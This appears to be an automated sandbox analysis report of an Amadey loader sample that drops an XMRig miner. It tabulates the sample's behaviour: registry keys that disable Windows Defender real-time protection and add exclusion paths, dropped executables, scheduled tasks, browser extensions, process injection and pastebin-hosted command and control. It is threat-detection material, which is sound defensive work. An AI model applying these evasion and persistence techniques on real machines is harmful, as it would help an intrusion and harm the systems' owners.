Analysis Overview
SHA256
fa6aa0dd992228ace8364ddfe1df64c539ee82217fe36710e5882f62dc9868d7
Threat Level: Known bad
The file fa6aa0dd992228ace8364ddfe1df64c539ee82217fe36710e5882f62dc9868d7 was found to be: Known bad.
Malicious Activity Summary
Windows security bypass
Amadey family
xmrig
Amadey
Modifies Windows Defender Real-time Protection settings
XMRig Miner payload
Command and Scripting Interpreter: PowerShell
Stops running service(s)
Creates new service(s)
Downloads MZ/PE file
Blocklisted process makes network request
UPX packed file
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Reads user/profile data of web browsers
Checks BIOS information in registry
Power Settings
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Drops Chrome extension
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Program crash
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Scheduled Task/Job: Scheduled Task
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix
Analysis: static1
Detonation Overview
Reported
2024-06-20 23:56
Signatures
Amadey family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-20 23:56
Reported
2024-06-21 00:01
Platform
win7-20240419-en
Max time kernel
299s
Max time network
293s
Command Line
Signatures
Amadey
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dEiqbvzNTqQVhmXUeQR = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QVWjqfQytQiLC = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\cksoItPsQhGrxIuH = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XPXpeEiKDyUn = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\cksoItPsQhGrxIuH = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\cksoItPsQhGrxIuH = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QVWjqfQytQiLC = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dSFCGoajU = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LIlQlxhqsAqlQuVB = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yPeEHKRKYSIU2 = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yPeEHKRKYSIU2 = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XPXpeEiKDyUn = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dSFCGoajU = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\cksoItPsQhGrxIuH = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LIlQlxhqsAqlQuVB = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dEiqbvzNTqQVhmXUeQR = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS2EBE.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS3D20.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\263c5c4d73\Hkbsse.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000003001\b2c2c1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000005001\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000006001\FirstZ.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS2971.tmp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS2EBE.tmp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000009001\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS3997.tmp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS3D20.tmp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\e221f72865\Dctooux.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\ProgramData\wikombernizc\reakuqnanrkn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\ZGvPVAg.exe | N/A |
| N/A | N/A | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\ZGvPVAg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_4780F988327458A7DCEC4A36CEB1E168 | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\FirstZ.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\wikombernizc\reakuqnanrkn.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\ZGvPVAg.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_4780F988327458A7DCEC4A36CEB1E168 | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_65F72881313B5F8FFC737C28E760643D | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_9FBE97E00625C0963C1CF751F29CF9B3 | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_9FBE97E00625C0963C1CF751F29CF9B3 | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\ZGvPVAg.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_65F72881313B5F8FFC737C28E760643D | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\ZGvPVAg.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2960 set thread context of 2336 | N/A | C:\ProgramData\wikombernizc\reakuqnanrkn.exe | C:\Windows\system32\conhost.exe |
| PID 2960 set thread context of 2800 | N/A | C:\ProgramData\wikombernizc\reakuqnanrkn.exe | C:\Windows\explorer.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File created | C:\Program Files (x86)\yPeEHKRKYSIU2\urxfMww.xml | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File created | C:\Program Files (x86)\QVWjqfQytQiLC\GRnylSJ.dll | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File created | C:\Program Files (x86)\XPXpeEiKDyUn\ZBGzrKT.dll | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File created | C:\Program Files (x86)\yPeEHKRKYSIU2\ruBTTzTZNveik.dll | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File created | C:\Program Files (x86)\QVWjqfQytQiLC\FvNvEsx.xml | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File created | C:\Program Files (x86)\dSFCGoajU\uTzZvi.dll | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File created | C:\Program Files (x86)\dSFCGoajU\LXzExIm.xml | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File created | C:\Program Files (x86)\dEiqbvzNTqQVhmXUeQR\SsyAlBr.xml | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
| File created | C:\Program Files (x86)\dEiqbvzNTqQVhmXUeQR\UVhuxbe.dll | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Dctooux.job | C:\Users\Admin\AppData\Local\Temp\1000003001\b2c2c1.exe | N/A |
| File created | C:\Windows\Tasks\bRfJDuKmNsszhfPRJj.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File created | C:\Windows\Tasks\ZeWKVsXrVUhETallN.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\IKgJWbxobPFnKRD.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\igQCsPejxzPEidhrw.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\fa6aa0dd992228ace8364ddfe1df64c539ee82217fe36710e5882f62dc9868d7.exe | N/A |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File opened for modification | C:\Windows\Tasks\bRfJDuKmNsszhfPRJj.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS2EBE.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS2EBE.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS3D20.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS3D20.tmp\Install.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\Temp\cksoItPsQhGrxIuH\VbWwSTopJxofzBQ\gkBgmyp.exe | N/A |
